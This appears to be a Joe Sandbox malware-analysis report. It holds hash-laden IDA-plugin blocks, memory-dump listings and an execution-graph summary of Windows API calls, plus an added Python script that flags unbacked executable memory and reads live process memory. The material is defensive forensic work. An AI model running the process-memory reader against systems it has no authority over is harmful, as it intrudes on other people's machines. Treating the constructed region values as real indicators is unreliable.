                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e82241198d6eeddc60723cbf369eda0ec635899d62b830b98e81dd5d39f9054e
                                                  • Instruction ID: e5997a5584979bc36ce065bc82f8eba1b2865e14dd6c99a62322dc35ce7d08b5
                                                  • Opcode Fuzzy Hash: e82241198d6eeddc60723cbf369eda0ec635899d62b830b98e81dd5d39f9054e
                                                  • Instruction Fuzzy Hash: 0EE01271909218EFD700EFA4D51669EBBFDEB4A206F005AA5A5499B110FE314E009B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 170ba1ff578cff43dffda045faba17bb0357f195be7a50c8d79f95bd0c7133d6
                                                  • Instruction ID: 5ace65fa4014719249c422cf6e9e91a14002b8be13219b4aad88f42922ebcdb1
                                                  • Opcode Fuzzy Hash: 170ba1ff578cff43dffda045faba17bb0357f195be7a50c8d79f95bd0c7133d6
                                                  • Instruction Fuzzy Hash: BCE0EC74909208EBCB04EB94D55296DBBB8EB46315F1091EDDC181B381DB325E42DB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae724905daf151cbbc7b425ff55d6b7b0e74752c02ecfa10a06031d5fc6c3e23
                                                  • Instruction ID: 58a0b77f4258ecad1e590a0136dee5122ad7c63bca483e0dac709acaa890b3f9
                                                  • Opcode Fuzzy Hash: ae724905daf151cbbc7b425ff55d6b7b0e74752c02ecfa10a06031d5fc6c3e23
                                                  • Instruction Fuzzy Hash: EAD05231A02218CFCB10DB88EC40BECBBB8FBC9222F0042E2C40CA2214D3302A80CF20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5691910bc6c0cb471310e8dfe2ab4ca15412b640b362f44b23fe7782daa6e00b
                                                  • Instruction ID: 0a28acde029746a378467150cc82671a123f55fc3f6ef66ed998c9f419ba4f90
                                                  • Opcode Fuzzy Hash: 5691910bc6c0cb471310e8dfe2ab4ca15412b640b362f44b23fe7782daa6e00b
                                                  • Instruction Fuzzy Hash: FFE0E238A0421A8FCB20EF28E4427A9BBB5FB48300F0041A9E409A7706E7306E418F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4eba574e5ee9b55e2b432f991b557ef0d68bba87bd23c082f87660f660efdec6
                                                  • Instruction ID: 18b7cd7d9fa63072407bd1586143598698030d876e3fa545e395dbf155474c34
                                                  • Opcode Fuzzy Hash: 4eba574e5ee9b55e2b432f991b557ef0d68bba87bd23c082f87660f660efdec6
                                                  • Instruction Fuzzy Hash: 7AC08071814308ABC350DFB9D8097197BACD707355F444454F408C7140DF715550C665
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3df88673862557b8a49f92dc070d335783d38eb331b780ba627d5370c58e0cb
                                                  • Instruction ID: 3b16e8928c92c15c4bd8b863a597b83211b85a8c971bdc64be7ce4f41a82d135
                                                  • Opcode Fuzzy Hash: d3df88673862557b8a49f92dc070d335783d38eb331b780ba627d5370c58e0cb
                                                  • Instruction Fuzzy Hash: 45E0E278905219CBEB50CF60DD44BACBBB4FB08300F008295D80EAB380DA304A85CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8d61f87774fb8aeda9971e2c4e67223f1eca52a874cfdbf23e810bd770c29b0
                                                  • Instruction ID: 4431a2a80313b61000ec29db224139f3f0e1b319e02fc45ca652d7037c5d552a
                                                  • Opcode Fuzzy Hash: f8d61f87774fb8aeda9971e2c4e67223f1eca52a874cfdbf23e810bd770c29b0
                                                  • Instruction Fuzzy Hash: 99D09E74918198CBCB40DF90D5555ACBFB8FB09302F109855D40FAA244CA351D84CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ab8b1b5fd4a6f4729bc247b24a0a17d4e85d0da40f617fee0caa36cedc046ea
                                                  • Instruction ID: 36142bbda40b9ca71327d8bb0814098b52b0065a1d3fd838edbe85579226eb9f
                                                  • Opcode Fuzzy Hash: 4ab8b1b5fd4a6f4729bc247b24a0a17d4e85d0da40f617fee0caa36cedc046ea
                                                  • Instruction Fuzzy Hash: 63C08CB00123048BD3106FAAA81C329376CAF06206FC00015EA08414608B714886CFB6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13930bb6605cdd3abdd091ddcbdeada492517ed7655ac2772a65d48954a5cff7
                                                  • Instruction ID: a83f0f90833cf504f56f02eb788ec5b7fc9590b446f2fe99998076bbeacfd85a
                                                  • Opcode Fuzzy Hash: 13930bb6605cdd3abdd091ddcbdeada492517ed7655ac2772a65d48954a5cff7
                                                  • Instruction Fuzzy Hash: 04B09B3594660CC7C750DA50F4544BD7736EB8A232B105285DC0E231004F315950CA95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 681dedbfdf9f8162d3ebc45c3ff037dc5acf6ea8aff2af64f0667aadd4662e24
                                                  • Instruction ID: 4fa0987838fc3258bfe2bcd001ce73952f2fd5ef10f432c5f8a516853d3a28b9
                                                  • Opcode Fuzzy Hash: 681dedbfdf9f8162d3ebc45c3ff037dc5acf6ea8aff2af64f0667aadd4662e24
                                                  • Instruction Fuzzy Hash: A2B01275294300E7BAC463648C50A5BAA66BBF5B01B40BC42731814010DD70E429E36F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T+-q$[V~*$[V~*$]\`
                                                  • API String ID: 0-1849991408
                                                  • Opcode ID: a63563a1a284b55ad8cfe78a8599e8cdc1d291871e8c7b6c22b5ea3e6f4bd5f0
                                                  • Instruction ID: 632a85313d21cfc0e67b8503a50962086ed2913a77f417107fd4d1b2f3e06d22
                                                  • Opcode Fuzzy Hash: a63563a1a284b55ad8cfe78a8599e8cdc1d291871e8c7b6c22b5ea3e6f4bd5f0
                                                  • Instruction Fuzzy Hash: C0B116B0E152199FCB04DFAAD9808AEFBF2FF89305F54D92AD815BB214D73099428F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T+-q$[V~*$]\`
                                                  • API String ID: 0-3978741314
                                                  • Opcode ID: e9a62a80e6be190934ec47fc510e58b26118f62248416e234024c449c09da216
                                                  • Instruction ID: e8d88e3fdacbba050a5e7d3cf9bcf2d93cef46cfac4fcb3da487a395b83813bd
                                                  • Opcode Fuzzy Hash: e9a62a80e6be190934ec47fc510e58b26118f62248416e234024c449c09da216
                                                  • Instruction Fuzzy Hash: 1DB117B0E152199FCB04DFAAD9808AEFBF2FF89305F54D92AD815BB214D73099428F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 7Z/t$RWIK$[[bb
                                                  • API String ID: 0-1157992699
                                                  • Opcode ID: 668f8d1441c90c8ec53d81a17e69523536d44331c98a1e893a0645db2403501c
                                                  • Instruction ID: 5c4370a1417085951479ecd292ab0bb2749f79f7387298b3a564f73bf48a15a0
                                                  • Opcode Fuzzy Hash: 668f8d1441c90c8ec53d81a17e69523536d44331c98a1e893a0645db2403501c
                                                  • Instruction Fuzzy Hash: DB51F570E05709CFDB48CFAAC5455AEFBF2AF89300F14E42AD459AB254D7349A428F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$B$B
                                                  • API String ID: 0-685577651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$B$B
                                                  • API String ID: 0-685577651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:6.3%
                                                  Dynamic/Decrypted Code Coverage:72.2%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:90
                                                  Total number of Limit Nodes:7
                                                  [Execution graph rendered as an image in the original report. Recoverable from the serialised graph, by entry point and the API it reaches: 0xedaed8 -> DuplicateHandle; 0x61500a0 -> 0x61500e5 / 0x61500f0 -> CreateWindowExW; 0xe0d01c -> 0x61502a1 / 0x61502a8 / 0x6150298 / 0x6151408 / 0x61513ff -> CallWindowProcW (via 0x6150414, 0x6151590, 0x6151648, 0x6152a90); 0x6154c78 -> 0x615407c -> 0x6154ff8 -> OleInitialize; 0xedb690 -> 0xedaaec -> 0x6155201 / 0x6155210 -> 0x61556d8 -> WaitMessage; 0xedac90 -> GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId.]
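The process-5 dump descriptors in this section (0x00ED0000, 0x06150000, 0x00E0D000, 0x00CED000) all carry the fields 00000040 and 00020000 and are marked "based on PE: false", and the execution graph statistics report 72.2% dynamic/decrypted code coverage: most of what ran in that process ran from memory not backed by the sample on disk. The script below is an added example, not Joe Sandbox's code and not code from the analysed sample, of the triage check that turns such descriptors into a finding on a live process or on regions exported from a memory image: flag committed executable regions that are private or mapped rather than image-backed, note whether they still carry a PE header (the same question the report's "based on PE" flag answers), and call out RWX separately. Reading the 00000040 and 00020000 descriptor fields as the Win32 PAGE_EXECUTE_READWRITE protection and MEM_PRIVATE type is an assumption about Joe Sandbox's dump naming; the region sizes, region bytes and the image-backed entry in regions_from_this_report are constructed for the example.

```python
"""Triage of unbacked executable memory, modelled on the dump descriptors in this
report. Added example, not Joe Sandbox code and not code from the analysed sample;
region sizes, region bytes and the image-backed entry below are constructed."""
import struct
import sys
from dataclasses import dataclass
from typing import List, Optional

# Win32 constants from <winnt.h>
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x10, 0x20, 0x40, 0x80
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE_EXEC_MASK = PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
MEM_COMMIT, MEM_PRIVATE, MEM_IMAGE = 0x1000, 0x20000, 0x1000000

@dataclass
class Region:
    base: int
    size: int
    protect: int
    state: int
    type_: int
    first_bytes: bytes = b""  # head of the region, used for the PE-header check
    executed: bool = False    # True if the sandbox saw code run from this region

def looks_like_pe(buf: bytes) -> bool:
    """MZ header whose e_lfanew points at 'PE\\0\\0'? Injected images keep headers, shellcode and JIT output do not."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def triage(region: Region) -> Optional[str]:
    """Label a region worth a look, or None. Same heuristic as Volatility's malfind: committed, executable, not image-backed."""
    if region.state != MEM_COMMIT or not (region.protect & EXEC_MASK):
        return None
    if region.type_ == MEM_IMAGE:
        return None  # backed by a file on disk: inspect the file, not the memory
    kind = "private" if region.type_ == MEM_PRIVATE else "mapped"
    label = f"{kind} {'RWX' if region.protect & WRITABLE_EXEC_MASK else 'RX'}"
    if looks_like_pe(region.first_bytes):
        label += ", PE header present"
    if region.executed:
        label += ", executed"
    return label

def findings(regions: List[Region]) -> List[str]:
    """One line per flagged region: base, size, label."""
    return [f"{r.base:#010x} {r.size:#x} {lbl}" for r in regions if (lbl := triage(r))]

def fake_pe_header() -> bytes:
    """Constructed minimal MZ/PE header, used for the image-backed entry below."""
    hdr = bytearray(0x44)
    hdr[:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr)

def regions_from_this_report() -> List[Region]:
    """Process-5 regions built from the descriptors above: base address and protection 0x40 come
    from the descriptor names, the rest is constructed; the third entry is a hypothetical image-backed main module."""
    stub = b"\x55\x8b\xec" + b"\x90" * 0x40  # push ebp; mov ebp, esp; nops
    return [
        Region(0x06150000, 0x13000, PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, stub, True),
        Region(0x00ED0000, 0x10000, PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, stub, True),
        Region(0x00400000, 0x08000, PAGE_EXECUTE_READ, MEM_COMMIT, MEM_IMAGE, fake_pe_header()),
    ]

def enumerate_live(pid: int) -> List[Region]:
    """Walk a live process with VirtualQueryEx + ReadProcessMemory (Windows only; needs PROCESS_QUERY_INFORMATION | PROCESS_VM_READ)."""
    if sys.platform != "win32":
        raise OSError("live enumeration needs Windows")
    import ctypes
    from ctypes import wintypes
    class MBI(ctypes.Structure):  # MEMORY_BASIC_INFORMATION; PartitionId exists only on x64
        _fields_ = ([("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                     ("AllocationProtect", wintypes.DWORD)]
                    + ([("PartitionId", wintypes.WORD)] if ctypes.sizeof(ctypes.c_void_p) == 8 else [])
                    + [("RegionSize", ctypes.c_size_t), ("State", wintypes.DWORD),
                       ("Protect", wintypes.DWORD), ("Type", wintypes.DWORD)])
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = wintypes.HANDLE
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.VirtualQueryEx.argtypes = [wintypes.HANDLE, wintypes.LPCVOID, ctypes.POINTER(MBI), ctypes.c_size_t]
    k32.ReadProcessMemory.argtypes = [wintypes.HANDLE, wintypes.LPCVOID, wintypes.LPVOID,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    handle = k32.OpenProcess(0x0410, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    regions, addr, mbi, head, got = [], 0, MBI(), ctypes.create_string_buffer(0x200), ctypes.c_size_t()
    try:
        while k32.VirtualQueryEx(handle, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            base = mbi.BaseAddress or 0
            got.value = 0
            k32.ReadProcessMemory(handle, base, head, 0x200, ctypes.byref(got))
            regions.append(Region(base, mbi.RegionSize, mbi.Protect, mbi.State, mbi.Type, head.raw[:got.value]))
            addr = base + mbi.RegionSize
    finally:
        k32.CloseHandle(handle)
    return regions

if __name__ == "__main__":
    regs = enumerate_live(int(sys.argv[1])) if len(sys.argv) > 1 else regions_from_this_report()
    print("\n".join(findings(regs)) or "nothing flagged")
```

Run it with no argument to see the two constructed process-5 regions flagged and the image-backed one ignored; on Windows, pass a PID to walk a live process. Try it against an ordinary .NET Framework process before trusting it on a suspect one: the CLR's JIT heaps are also private RWX, so "private RWX" on its own is noise in managed processes, and the discriminators are whether code actually ran from the region and whether a whole PE image sits there. For a memory image, build Region objects from your forensics tool's VAD walk instead of enumerate_live; triage and findings do not depend on the live API.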

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0x6155210, basic blocks 0x6155210-0x6155797, internal calls to 0x61540f8, 0x6154104, 0x6154110, 0x615411c, 0x6154128, 0x6154138, 0x6154144 and 0x6154150, API call WaitMessage in block 0x61556d8. The executed/not-executed colouring of the original is not recoverable in text.]
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 833557c5644a7fb8071b53c4cf23fbeffc91d2cef9ce461e51fe2985cba3f6f0
                                                  • Instruction ID: 2f34e76491336a30b51edee11dc00484a1d35e5f216533f93571bb7af0402193
